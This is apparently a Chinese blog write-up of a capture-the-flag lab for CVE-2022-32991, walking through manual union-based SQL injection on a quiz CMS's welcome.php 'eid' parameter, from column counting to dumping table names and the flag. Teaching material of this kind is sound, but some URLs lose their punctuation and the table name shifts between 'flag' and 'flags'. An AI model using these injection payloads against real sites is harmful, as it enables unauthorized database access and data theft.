春秋云镜——CVE-2022-32991

张

张建站

2026/5/26 13:20:51

10分钟阅读

靶标介绍该CMS的welcome.php中存在SQL注入攻击。解题思路1.在登录页创建账户进行登录2.来到下图界面点击start在下图页面url中我们看到eid参数注入点这时候我们进行手工sql注入测试3.判断注入点单引号闭合下图是原始url加单引号测试报错说明字符型welcome.php?qquizstep2eid60377db362694n1t34单引号闭合成功4.爆字段数order by order by 5--welcome.php?qquizstep2eid60377db362694 order by 5--n1t34下图是输入了order6的结果order by 5 正常order by 6 报错 → 共 5 列5.爆显位union select union select 1,2,3,4,5--welcome.php?qquizstep2eid60377db362694 union select 1,2,3,4,5--n2t34页面回显 3 → 显位在第 3 列6.爆数据库名 union select 1,2,database(),4,5--welcome.php?qquizstep2eid60377db362694 union select 1,2,database(),4,5--n2t34得到库名ctf7.爆表名 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schemadatabase()--welcome.php?qquizstep2eid60377db362694 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schemadatabase()--n2t34找flag表8.爆列名flag 表 union select 1,2,flag,4,5 from flag--welcome.php?qquizstep2eid60377db362694 union select 1,2,flag,4,5 from flag--n2t349.拿 flag union select 1,2,flag,4,5 from flags--welcome.php?qquizstep2eid60377db362694 union select 1,2,flag,4,5 from flags--n2t34

顶伯文字转语音工具功能详解，全场景轻松配音

🎯 顶伯文字转语音工具功能详解，全场景轻松配音在内容创作日益多元化的今天，高质量的语音合成工具成为提升作品表现力的关键。顶伯文字转语音工具凭借其丰富的功能、精准的语音合成和便捷的操作，为用户提供全场景的配音解决方案。…...

2026/5/26 13:20:36 阅读更多 →

LSB与DCT隐写术在医疗影像数据安全中的实战性能对比

1. 项目概述：当医疗影像遇上数据隐身术在远程医疗和数字化诊断日益普及的今天，医生之间传输一张CT或MRI影像就像我们发一张普通图片一样简单。但你想过没有，这张看似普通的“图片”里，除了病灶信息，还关联着患者的姓名…...

2026/5/26 13:17:16 阅读更多 →

网页禁止复制破解方法

文章目录简介方法一复制破解插件方法二划词插件简介有一些网页会限制你复制内容（如本站），下面我来介绍一下如何破解复制。方法一复制破解插件可以下载一个复制破解插件（如 Supercopy ），然后点击“…...

2026/5/26 13:16:14 阅读更多 →

Oracle EBS R12 主 / 辅助分类帐（主 / 辅助帐套）

Oracle EBS R12 主 / 辅助分类帐（主 / 辅助帐套）落地全套文档包含：配置清单、科目映射规则模板、4 类典型调整分录、税会 / IFRS 案例分录，可直接用于实施、方案文档、上线配置。说明：R11 帐套 (SOB)、R12 分类帐 (Led…...

2026/5/26 9:09:40 阅读更多 →

Harness的配置漂移检测与自动修复

云原生时代的稳定性利器：Harness配置漂移检测与自动修复全指南引言痛点引入相信每一位DevOps工程师、SRE或者运维负责人都遇到过这样的噩梦： 测试环境验证了3天的功能，上线到生产10分钟就出现503错误，排查了2小时才发现&…...

2026/5/26 9:11:16 阅读更多 →

【工程实践】代码质量与测试策略：构建可靠的软件交付体系

【工程实践】代码质量与测试策略：构建可靠的软件交付体系引言代码质量是软件项目成功的关键因素之一。良好的代码质量不仅能提高开发效率，还能降低维护成本，提升系统的可靠性。本文将详细介绍代码质量保障和测试策略的最佳实践。一、代码质…...

2026/5/26 7:22:22 阅读更多 →

3分钟快速上手OBS多平台同步直播插件：告别重复配置，一键推流到多个平台

3分钟快速上手OBS多平台同步直播插件：告别重复配置，一键推流到多个平台【免费下载链接】obs-multi-rtmp OBS複数サイト同時配信プラグイン项目地址: https://gitcode.com/gh_mirrors/ob/obs-multi-rtmp 你是否曾经为在不同直播平台同步推流而烦…...

2026/5/25 17:59:32 阅读更多 →